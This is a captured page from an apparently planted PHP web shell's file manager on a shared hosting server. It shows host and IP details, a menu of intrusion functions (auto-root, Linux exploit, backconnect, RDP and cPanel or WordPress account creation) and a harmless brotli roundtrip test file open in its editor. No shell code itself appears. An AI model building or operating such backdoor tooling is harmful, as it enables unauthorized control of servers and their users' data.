Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.118.144.199
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
tests /
alt-php83-brotli_0.5.0-3.el8 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
compatibility.phpt
6.59
KB
-rw-r--r--
info.phpt
268
B
-rw-r--r--
roundtrip.phpt
2.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : roundtrip.phpt
--TEST-- Test compatibility --SKIPIF-- --FILE-- <?php if (!extension_loaded('brotli')) { dl('brotli.' . PHP_SHLIB_SUFFIX); } $dir = __DIR__ . '/../brotli/'; $files = array( 'tests/testdata/alice29.txt', 'tests/testdata/asyoulik.txt', 'tests/testdata/lcet10.txt', 'tests/testdata/plrabn12.txt', '/c/enc/encode.c', '/c/common/dictionary.h', '/c/dec/decode.c', ); $qualities = array(1, 6, 9, 11); foreach ($files as $filename) { foreach ($qualities as $quality) { echo 'Roundtrip testing file ', basename($filename), ' at quality ', $quality, PHP_EOL; $expected = $dir . $filename; if (file_exists($expected)) { $data = file_get_contents($expected); $expected_data = brotli_uncompress(brotli_compress($data, $quality)); if ($data !== $expected_data) { echo " NG\n"; exit(1); } else { echo " OK\n"; } } } } --EXPECTF-- Roundtrip testing file alice29.txt at quality 1 OK Roundtrip testing file alice29.txt at quality 6 OK Roundtrip testing file alice29.txt at quality 9 OK Roundtrip testing file alice29.txt at quality 11 OK Roundtrip testing file asyoulik.txt at quality 1 OK Roundtrip testing file asyoulik.txt at quality 6 OK Roundtrip testing file asyoulik.txt at quality 9 OK Roundtrip testing file asyoulik.txt at quality 11 OK Roundtrip testing file lcet10.txt at quality 1 OK Roundtrip testing file lcet10.txt at quality 6 OK Roundtrip testing file lcet10.txt at quality 9 OK Roundtrip testing file lcet10.txt at quality 11 OK Roundtrip testing file plrabn12.txt at quality 1 OK Roundtrip testing file plrabn12.txt at quality 6 OK Roundtrip testing file plrabn12.txt at quality 9 OK Roundtrip testing file plrabn12.txt at quality 11 OK Roundtrip testing file encode.c at quality 1 OK Roundtrip testing file encode.c at quality 6 OK Roundtrip testing file encode.c at quality 9 OK Roundtrip testing file encode.c at quality 11 OK Roundtrip testing file dictionary.h at quality 1 OK Roundtrip testing file dictionary.h at quality 6 OK Roundtrip testing file dictionary.h at quality 9 OK Roundtrip testing file dictionary.h at quality 11 OK Roundtrip testing file decode.c at quality 1 OK Roundtrip testing file decode.c at quality 6 OK Roundtrip testing file decode.c at quality 9 OK Roundtrip testing file decode.c at quality 11 OK
Close